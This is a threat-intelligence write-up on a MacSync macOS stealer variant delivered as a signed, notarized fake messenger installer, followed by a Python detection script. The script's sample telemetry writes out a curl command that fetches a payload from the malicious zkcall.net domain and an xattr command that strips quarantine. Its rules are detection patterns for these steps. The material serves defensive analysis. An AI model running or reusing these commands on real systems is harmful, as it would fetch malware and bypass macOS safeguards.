Full Report
Cybersecurity researchers have discovered a new variant of a macOS information stealer called MacSync that's delivered by means of a digitally signed, notarized Swift application masquerading as a messaging app installer to bypass Apple's Gatekeeper checks. "Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more
Analysis Summary
# Tool/Technique: MacSync (New Variant)
## Overview
MacSync is a variant of a macOS information stealer. The latest delivery mechanism uses a digitally signed and notarized Swift application, masquerading as a messaging app installer, to bypass Apple's Gatekeeper security checks. This new variant moves away from older, more obvious distribution methods like "drag-to-terminal" or "ClickFix" techniques.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: macOS
- Capabilities: Data theft, remote command and control (C2), evasion of security controls.
- First Seen: The article references a previous analysis of MacSync in April 2025; the specific new variant is detailed in late December 2025.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on the described behavior (e.g., bypassing defenses, information gathering)*
- **TA0001 - Initial Access**
  - T1566 - Phishing (Implied delivery via deceptive installer)
  - T1566.002 - Spearphishing Link (Implied if the DMG link is shared via targeted communication)
- **TA0005 - Defense Evasion**
  - T1218 - Signed Binary Proxy Execution
  - T1218.011 - Signed and Notarized Application (Use of legitimate signed application to execute malicious payload)
- **TA0009 - Collection**
  - T1119 - Automated Collection (Implied by 'information stealer' functionality)
## Functionality
### Core Capabilities
- **Delivery/Execution:** Delivered within a Disk Image (DMG) file disguised as a messaging app installer ("zk-call-messenger-installer-3.9.2-lts.dmg").
- **Evasion:** Uses a Swift application that is both **digitally signed and notarized** by Apple, allowing it to bypass initial checks by Gatekeeper and XProtect.
- **User Interaction Trick:** Prompts users to right-click and "open" the app, a common social engineering prompt used to manually bypass safeguards on notarized applications.
- **Payload Retrieval:** Uses a `curl` command (with flags `-fL -sS --noproxy`) to download an encoded script/payload from a remote source.
- **Execution Chain:** The signed Swift dropper performs checks (internet connectivity, execution interval enforcement) before downloading and executing an encoded script via a helper component.
### Advanced Features
- **Rate Limiting:** Enforces a minimum interval of approximately 3600 seconds (1 hour) between executions, likely to frustrate automated analysis and sandbox runs that observe the sample only briefly.
- **Payload Obfuscation:** The final payload is Base64-encoded.
- **Persistence/Capability:** It is a rebranded version of Mac.c, utilizing a Go-based agent that provides fully-featured remote command and control capabilities beyond simple data theft.
- **Evasion Tactic:** Uses an unusually large DMG file (25.5 MB), padding the size by embedding unrelated PDF documents to potentially confuse basic file analysis tools.
## Indicators of Compromise
- File Hashes: [Not provided in the article]
- File Names: "zk-call-messenger-installer-3.9.2-lts.dmg"
- Registry Keys: [Not applicable/mentioned for macOS initial execution]
- Network Indicators: `zkcall[.]net/download` (Defanged)
- Behavioral Indicators: The application prompts users to right-click and "open" it; after launch it downloads and executes an encoded script; the download uses `curl` with the flag combination `-fL -sS --noproxy`.
## Associated Threat Actors
- [Not explicitly named, but the tool itself (MacSync) is being tracked by researchers (Jamf).]
## Detection Methods
- **Signature-based detection:** Target the known DMG file name and the specific `curl` command line. Apple has since revoked the code signing certificate used, so the original signed bundle no longer passes Gatekeeper's signature check.
- **Behavioral detection:** Monitoring for Swift executables that initiate network connections using unusual `curl` flag combinations or that modify quarantine attributes before execution.
- **YARA rules if available:** [Not provided in the article]
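The behavioral indicators above (the `curl` flag combination, a network tool spawned by a process running from a mounted disk image, and quarantine-attribute removal before execution) can be turned into simple rules over process telemetry. The following is an added example, not code from the article or from Jamf; the pipe-separated event format, the sample event lines and the `/tmp` paths are constructed for illustration, and the only indicators it carries are the file name, domain and `curl` flags already listed on this page.

```python
"""Flag process events that match the MacSync delivery chain described above.

Added example (not from the article). Input is a constructed, hypothetical
event schema: one process start per line, 'pid|ppid|exe_path|cmdline'.
Real EDR / Endpoint Security telemetry uses its own schema; only the
matching logic is meant to carry over.
"""
import shlex
from typing import Dict, List, Tuple

# Indicators taken from the page. The domain is kept defanged, as threat
# intel feeds usually ship it, and refanged at match time.
SUSPICIOUS_CURL_FLAGS = {"-fL", "-sS", "--noproxy"}
KNOWN_DOMAINS_DEFANGED = {"zkcall[.]net"}
KNOWN_DMG_FILENAMES = {"zk-call-messenger-installer-3.9.2-lts.dmg"}

# Constructed sample telemetry: a mount of the known DMG, the installer
# running from the mounted volume, its curl and xattr children, plus two
# benign events that must not be flagged.
SAMPLE_EVENTS = """\
500|1|/usr/bin/hdiutil|hdiutil attach /Users/alice/Downloads/zk-call-messenger-installer-3.9.2-lts.dmg
501|1|/Volumes/ZK Call/ZK Call Installer.app/Contents/MacOS/ZK Call Installer|'/Volumes/ZK Call/ZK Call Installer.app/Contents/MacOS/ZK Call Installer'
502|501|/usr/bin/curl|curl -fL -sS --noproxy '*' https://zkcall.net/download -o /tmp/payload.b64
503|501|/usr/bin/xattr|xattr -d com.apple.quarantine /tmp/helper
504|600|/usr/bin/curl|curl -sS https://example.org/status
505|1|/Applications/Safari.app/Contents/MacOS/Safari|/Applications/Safari.app/Contents/MacOS/Safari
"""


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 'zkcall[.]net' back into a hostname."""
    return ioc.replace("[.]", ".")


def parse_events(text: str) -> List[Dict]:
    """Parse 'pid|ppid|exe|cmdline' lines into dicts (constructed format)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, exe, cmd = line.split("|", 3)
        events.append({"pid": int(pid), "ppid": int(ppid), "exe": exe, "cmd": cmd})
    return events


def _argv(cmdline: str) -> List[str]:
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        return cmdline.split()


def analyze(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) pairs for events matching the page's indicators."""
    by_pid = {e["pid"]: e for e in events}
    domains = {refang(d) for d in KNOWN_DOMAINS_DEFANGED}
    findings: List[Tuple[int, str]] = []

    for e in events:
        argv = _argv(e["cmd"])
        if not argv:
            continue
        name = argv[0].rsplit("/", 1)[-1]
        parent = by_pid.get(e["ppid"])

        # Rule 1: any argument whose basename is the known installer DMG name.
        if any(a.rsplit("/", 1)[-1] in KNOWN_DMG_FILENAMES for a in argv[1:]):
            findings.append((e["pid"], "known_dmg_filename"))

        if name == "curl":
            flags = {a for a in argv[1:] if a.startswith("-")}
            # Rule 2: the exact flag combination reported for this sample.
            if SUSPICIOUS_CURL_FLAGS <= flags:
                findings.append((e["pid"], "curl_flag_combination"))
            # Rule 3: network tool launched by a process running off a DMG.
            if parent and parent["exe"].startswith("/Volumes/"):
                findings.append((e["pid"], "network_tool_spawned_from_disk_image"))
            # Rule 4: URL argument pointing at a known domain.
            if any(d in a for a in argv[1:] for d in domains):
                findings.append((e["pid"], "known_c2_domain"))

        # Rule 5: quarantine attribute stripped (-d on the key, or -c clears all).
        if name == "xattr" and ("com.apple.quarantine" in argv or "-c" in argv):
            findings.append((e["pid"], "quarantine_attribute_removed"))

    return findings


if __name__ == "__main__":
    for pid, rule in analyze(parse_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {rule}")
```

The rules are deliberately independent so that a single hit (for example, the flag combination alone) is a low-confidence signal, while several hits on one process tree, as in the sample, justify an alert. The parent-path rule is the most durable of the five because it keys on the disk-image delivery pattern rather than on a file name or domain that the operators can change.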
## Mitigation Strategies
- **Certificate Revocation:** Apple revoked the code signing certificate used in this campaign; once revoked, the signed bundle no longer passes Gatekeeper on subsequent launches.
- **User Education:** Training users to be wary of installing applications that require explicit right-click-and-open prompts, even if they appear signed.
- **Application Hardening:** Implementing strict application control policies that monitor or restrict the execution of processes originating from downloaded disk images.
- **Network Monitoring:** Blocking or flagging connections to known malicious domains, such as `zkcall[.]net`.
## Related Tools/Techniques
- **MacSync (Previous variants):** Relied on drag-to-terminal or ClickFix techniques.
- **Mac.c:** The predecessor/base for MacSync.
- **Odyssey:** Another macOS infostealer recently observed using signed/notarized DMG files mimicking established apps (like Google Meet).
- **DigitStealer:** Another macOS infostealer mentioned that still relies on unsigned DMGs.